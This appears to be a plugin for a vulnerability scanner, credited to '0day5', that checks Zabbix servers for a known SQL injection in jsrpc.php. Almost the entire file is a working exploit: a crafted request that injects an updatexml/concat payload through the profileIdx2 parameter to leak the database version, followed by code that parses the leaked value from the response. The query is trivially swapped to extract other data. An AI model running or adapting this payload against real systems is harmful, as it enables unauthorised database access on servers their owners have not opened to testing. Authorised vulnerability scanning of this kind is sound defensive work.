# -*- coding: utf-8 -*-
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Generated by ptools
#__Author__ = 0day5
#_PlugName_ = zabbix
#__Refer___ = http://0day5.com/archives/4029
import re
def assign(service, arg):
    if service == fingerprint.zabbix:
        return True, arg
def audit(arg):
    payload = '/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(0,concat(0x7e7e7e,version(),0x7e7e7e),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17'
    target = arg + payload

    code, head, res, final_url, log= hackhttp.http(target)
    result = re.findall(r"~~~(.*?)~~~", res)
    if len(result)>0:
        security_note(target)
if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.zabbix, "http://0day5.com/zabbix")[1])